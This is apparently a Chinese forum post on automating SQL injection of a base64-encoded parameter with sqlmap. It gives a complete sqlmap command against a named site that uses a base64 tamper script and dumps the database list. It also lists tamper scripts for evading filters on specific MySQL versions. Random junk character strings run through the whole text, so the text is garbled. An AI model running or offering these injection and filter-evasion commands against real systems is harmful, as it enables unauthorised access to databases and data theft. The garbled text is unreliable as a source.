WVS扫某站就出来一个SQL Injection,参数还是base64编码的,手工注入麻烦一步,用sqlmap怎么自动注射呢?- A$ m8 a1 x' E; i1 |! L+ f
! u6 i& P- u5 h! T/ wsqlmap的tamper里有个base64encode.py
: z# n) H& M+ N
e% P! J) ]0 r5 h" H% r使用如下
) X2 ?3 h6 Z1 b1 x( T2 n* x- b4 f8 s8 h2 L2 `) `& E
sqlmap -u http://ha.cker.in/index.php?tel=LTEnIG9yICc4OCc9Jzg5 --tamper base64encode.py –dbs
0 ~0 i* r. w' N% ?, u6 r6 T2 W# {
+ T7 J, i6 E8 g. v' M+ \7 O
sqlmap拥有很多功能强力的插件,插件的使用方法: -- tamper “插件名称”( [! e* ~: E* _& G' {' f6 G
4 a& U7 O; l2 b其中常用到的bypass脚本绕过SQLMAP主要两个脚本:1 I# Y2 }) Z: D- \$ C/ @
$ M" o; [, {5 U" J
space2hash.py ,对于MYSQL数据库 4.0, 5.0注入
/ D5 Q% Q# R0 G% ospace2morehash.py ,对于MYSQL数据库 >= 5.1.13 和 MySQL 5.1.41 注入
, W2 l/ T+ d; J5 r7 b# J: `首先确定目标数据库版本,然后选择相应的脚本。0 J! o4 B, @% R- X2 S [
-v 3 --batch --tamper "space2hash.py"
) ~9 q! L8 [1 n2 R. W9 a; t% Q7 H, F9 B+ N
还有其他一些插件:
/ ?1 y }- K8 n! ]9 u* g% Kencodes编码 ——charencode.py
, J! U' F4 F7 C% sbase64编码 —— base64encode.py, ?2 T$ w# l! O* u
替换空格和关键字 —— halfversionedmorekeywords.py* ~! P8 j2 i6 D2 J% L' G
|
! D3 g6 }" K# f7 A
9 Z3 E: A/ e" i5 V& |
0 T0 ~* ?- B# u$ U2 {2 H$ p1 V y6 F
2 {% _" c& R( z9 v; W |
发表于 2013-11-23 15:50:45
收藏
支持
反对